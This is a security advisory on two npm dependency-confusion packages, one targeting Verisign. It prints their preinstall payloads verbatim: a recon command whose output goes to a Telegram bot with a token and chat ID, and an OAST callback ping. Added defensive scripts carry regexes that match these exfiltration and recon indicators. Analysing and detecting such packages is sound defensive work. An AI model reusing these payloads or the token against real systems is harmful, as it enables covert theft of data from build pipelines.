#009 | Severity: High | 2026-04-03

Dependency Confusion Targeting Verisign + a2a Protocol

@corpweb-ui/wmkt-library@99.99.11 + a2a-chat-canvas@97.9.9

Verdict: MALICIOUS — Executes code in corporate build pipelines

Overview

Two dependency confusion attacks. The first targets Verisign specifically, using version squatting (v99.99.11) and exfiltrating hostname/user data to a Telegram bot with message 'VERISIGN - RCE CONFIRMED'. The second targets an unknown internal package with version squatting (v97.9.9) and pings an OAST callback URL. Both self-declare as 'bug bounty' but execute code on install without consent.

  • Targets: 2
  • Version squatting: v99
  • Exfil channel: Telegram
  • Attack type: dependency confusion

Attack Flow

Version Squatting
Both packages use extremely high version numbers (v99.99.11, v97.9.9) to win npm's version resolution over legitimate internal packages.
Preinstall Execution
Preinstall hooks run node index.js, which executes the id, pwd and hostname commands to gather system info.
Data Exfiltration
Verisign attack sends results to Telegram bot 8699485977. a2a attack pings OAST callback URL for DNS-based confirmation.
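The three stages above (version squatting, a lifecycle hook, host recon plus an external callback) are all visible in a package's manifest and install script before anything is run. The following is an added triage script written for this report; it is not code from the report or from the packages it describes. The major-version threshold, the indicator regexes, the placeholder token and OAST id, and the three sample packages are constructed assumptions, patterned on the two payloads the report documents.

```javascript
// Added example (not code from the report or from the packages it describes):
// heuristic triage of an npm package's manifest plus the source of its
// install-time script, looking for the indicators the report lists.
// Thresholds, regexes and the sample inputs are constructed assumptions.

const SQUAT_MAJOR_THRESHOLD = 50;   // assumption: no legitimate internal package is at major >= 50
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators modelled on the two payloads in the report
const SCRIPT_INDICATORS = [
  { rule: 'telegram-api',  re: /api\.telegram\.org\/bot/i },          // Telegram Bot API as exfil channel
  { rule: 'oast-callback', re: /\.oast\.fun\b/i },                    // OAST domain seen in the report; extend as needed
  { rule: 'host-recon',    re: /\b(id|pwd|hostname|whoami)\b[^'"`\n]*&&|os\.hostname\(\)/ },
  { rule: 'shell-exec',    re: /child_process|\bexec(Sync)?\(/ },
];

// Major version from a semver string, or null when it cannot be parsed
function parseMajor(version) {
  const m = /^v?(\d+)\./.exec(version || '');
  return m ? Number(m[1]) : null;
}

// Returns { name, verdict, rules, findings } for one package
function triagePackage(manifest, scriptSource) {
  const findings = [];
  const major = parseMajor(manifest.version);
  if (major !== null && major >= SQUAT_MAJOR_THRESHOLD) {
    findings.push({ rule: 'version-squatting', detail: `${manifest.version} (major ${major} >= ${SQUAT_MAJOR_THRESHOLD})` });
  }
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push({ rule: 'lifecycle-hook', detail: `${hook}: ${scripts[hook]}` });
  }
  for (const ind of SCRIPT_INDICATORS) {
    const m = ind.re.exec(scriptSource || '');
    if (m) findings.push({ rule: ind.rule, detail: m[0].trim() });
  }
  const rules = [...new Set(findings.map(f => f.rule))].sort();
  const has = r => rules.includes(r);
  const exfil = has('telegram-api') || has('oast-callback');
  const recon = has('host-recon') || has('shell-exec');
  // A lifecycle hook combined with recon or an external callback is the report's pattern
  let verdict = 'clean';
  if (has('lifecycle-hook') && (exfil || recon)) verdict = 'malicious';
  else if (has('lifecycle-hook') || has('version-squatting') || exfil) verdict = 'suspicious';
  return { name: manifest.name, verdict, rules, findings };
}

// Constructed samples patterned on the report (token, chat id and OAST id are placeholders)
const SAMPLES = [
  {
    manifest: { name: '@corpweb-ui/wmkt-library', version: '99.99.11', scripts: { preinstall: 'node index.js' } },
    script: [
      "const { exec } = require('child_process');",
      "const https = require('https');",
      'exec("id && pwd && hostname", (e, out) => {',
      "  https.get('https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendMessage?chat_id=<CHAT_ID>&text=' + encodeURIComponent(out));",
      '});',
    ].join('\n'),
  },
  {
    manifest: { name: 'a2a-chat-canvas', version: '97.9.9', scripts: { preinstall: 'node index.js' } },
    script: [
      "const https = require('https');",
      "const os = require('os');",
      "https.get('http://<OAST_ID_PLACEHOLDER>.oast.fun/?host=' + encodeURIComponent(os.hostname()));",
    ].join('\n'),
  },
  {
    // benign control: low version, no lifecycle hooks, no network or shell use
    manifest: { name: 'left-pad-ish', version: '1.4.2', scripts: { test: 'node test.js' } },
    script: 'module.exports = (s, n) => s.padStart(n);',
  },
];

function triageSamples() {
  return SAMPLES.map(s => triagePackage(s.manifest, s.script));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of triageSamples()) console.log(r.name, r.verdict, r.rules.join(','));
}
```

On the two constructed samples the verdict is "malicious" because a preinstall hook co-occurs with recon and an external callback; version squatting alone only yields "suspicious", since high version numbers are also used legitimately. Feed it a real manifest and the file named in its preinstall script to triage an actual tarball.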

MITRE ATT&CK Mapping

T1195.002 Supply Chain Compromise — dependency confusion
T1059.007 JavaScript Execution — preinstall hook
T1041 Exfiltration Over C2 — Telegram bot exfiltration
T1592 Gather Victim Host Information — hostname/user recon

Tags

Dependency Confusion · Verisign · Telegram · Version Squatting · Build Pipeline

Full Report

Dependency Confusion Attacks: @corpweb-ui (Verisign) + a2a-chat-canvas

TL;DR

Two packages exploit dependency confusion to execute code on corporate build systems. One targets Verisign specifically and exfiltrates data via Telegram bot.

Package 1: @corpweb-ui/wmkt-library@99.99.11

Target: Verisign

  • Maintainer: bugbountyhunt (idea.egypt.eg@gmail.com)
  • Version: 99.99.11 (version squatting — high version to override internal packages)
  • Description: "Bug Bounty PoC for Verisign by Mohamed Elkhair"

Payload (verified from source code)

const cmd = "id && pwd && hostname";
exec(cmd, (error, stdout, stderr) => {
    const message = `🚨 *VERISIGN - RCE CONFIRMED* 🚨\n\n📦 *Target:* @corpweb-ui/wmkt-library\n\n📄 *Evidence:*\n\`\`\`\n${evidence}\n\`\`\``;
    const token = "8699485977:AAGE6u0cGKTTMuXq3TGjx05YMP8b6FibODs";
    const chatId = "1483949647";
    const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
    https.get(url);
});

Comments in Arabic: "توكن البوت والـ Chat ID بتوعك" (Your bot token and Chat ID)

IOCs

  • Telegram bot: 8699485977
  • Chat ID: 1483949647
  • Preinstall trigger: node index.js

Package 2: a2a-chat-canvas@97.9.9

Target: Unknown internal package

  • Maintainer: professor-x4 (projectfrst42@gmail.com)
  • Version: 97.9.9 (version squatting)
  • Description: "Security Research PoC for Dependency Confusion"

Payload (verified from source code)

const CALLBACK_URL = 'http://dwpmxufjontejuultjhe0dcw571lqawco.oast.fun/';
function sendPing() {
    const targetUrl = `${CALLBACK_URL}?host=${encodeURIComponent(hostname)}&poc=dependency_confusion`;
    https.get(targetUrl);
}
sendPing();

IOCs

  • OAST callback: dwpmxufjontejuultjhe0dcw571lqawco.oast.fun
  • Preinstall trigger: node index.js

Note

Both self-declare as "bug bounty" / "security research" but execute code on install without consent. Regardless of intent, they run arbitrary code in corporate build pipelines and exfiltrate data to external services.
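Whether or not the author meant it as a PoC, the outcome in a victim pipeline is the same: an internal package name resolved to the public registry and an install script ran. Both facts are recorded in package-lock.json, so a lockfile audit catches the confusion before the next install. The script below is an added example, not code from the report or from npm-sentinel; the internal registry URL, the internal scope and name lists, the constructed lockfile excerpt (including the made-up @corpweb-ui/design-tokens package) and the npm config it emits are assumptions. It relies on two real lockfile v2/v3 fields: `resolved` (the tarball URL) and `hasInstallScript` (set by npm when a package declares install hooks).

```javascript
// Added example (not from the report or from npm-sentinel): audit a
// package-lock.json "packages" map for internal dependencies that resolved to
// the public registry instead of the internal one, and for internal packages
// that carry install scripts. Registry URL, scope list and the sample lockfile
// are constructed assumptions.

const INTERNAL_REGISTRY = 'https://npm.internal.example/';  // placeholder for the real internal registry
const INTERNAL_SCOPES = ['@corpweb-ui'];                      // scope targeted in the report
const INTERNAL_NAMES = ['a2a-chat-canvas'];                   // assumption: unscoped internal package names
const PUBLIC_REGISTRY = 'https://registry.npmjs.org/';

// "node_modules/@scope/name" or "node_modules/a/node_modules/@scope/name" -> "@scope/name"
function packageNameFromKey(key) {
  const idx = key.lastIndexOf('node_modules/');
  return idx === -1 ? null : key.slice(idx + 'node_modules/'.length);
}

function isInternal(name) {
  return INTERNAL_SCOPES.some(s => name.startsWith(s + '/')) || INTERNAL_NAMES.includes(name);
}

// Returns one issue object per problem found; an empty array means the lockfile is consistent
function auditLockfile(lock) {
  const issues = [];
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    const name = packageNameFromKey(key);
    if (!name || !isInternal(name)) continue;
    const resolved = entry.resolved || '';
    if (!resolved.startsWith(INTERNAL_REGISTRY)) {
      issues.push({ name, version: entry.version, resolved, reason: 'internal package resolved outside internal registry' });
    }
    if (entry.hasInstallScript) {
      issues.push({ name, version: entry.version, resolved, reason: 'internal package declares an install script' });
    }
  }
  return issues;
}

// .npmrc lines that pin each internal scope to the internal registry and
// disable lifecycle scripts, which is what blocks the preinstall trigger
function npmrcForScopes() {
  return [
    ...INTERNAL_SCOPES.map(s => `${s}:registry=${INTERNAL_REGISTRY}`),
    'ignore-scripts=true',
  ].join('\n');
}

// Constructed lockfile excerpt: the two packages from the report resolved to the
// public registry, one internal package resolved correctly, one public package.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'corp-frontend', version: '1.0.0' },
    'node_modules/@corpweb-ui/wmkt-library': {
      version: '99.99.11',
      resolved: PUBLIC_REGISTRY + '@corpweb-ui/wmkt-library/-/wmkt-library-99.99.11.tgz',
      hasInstallScript: true,
    },
    'node_modules/a2a-chat-canvas': {
      version: '97.9.9',
      resolved: PUBLIC_REGISTRY + 'a2a-chat-canvas/-/a2a-chat-canvas-97.9.9.tgz',
      hasInstallScript: true,
    },
    'node_modules/@corpweb-ui/design-tokens': {   // made-up internal package, resolved correctly
      version: '2.3.1',
      resolved: INTERNAL_REGISTRY + '@corpweb-ui/design-tokens/-/design-tokens-2.3.1.tgz',
    },
    'node_modules/react': { version: '18.3.1', resolved: PUBLIC_REGISTRY + 'react/-/react-18.3.1.tgz' },
  },
};

function auditSample() {
  return auditLockfile(SAMPLE_LOCK);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const i of auditSample()) console.log(`${i.name}@${i.version}: ${i.reason} (${i.resolved})`);
  console.log('\nsuggested .npmrc:\n' + npmrcForScopes());
}
```

Run it in CI against the committed lockfile and fail the build on any issue. Note that `ignore-scripts=true` suppresses lifecycle scripts for every package, legitimate native builds included, so teams usually pair it with an explicit rebuild step for the few packages that need one.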

Credits

Detected by: npm-sentinel automated scanner
Date: 2026-04-03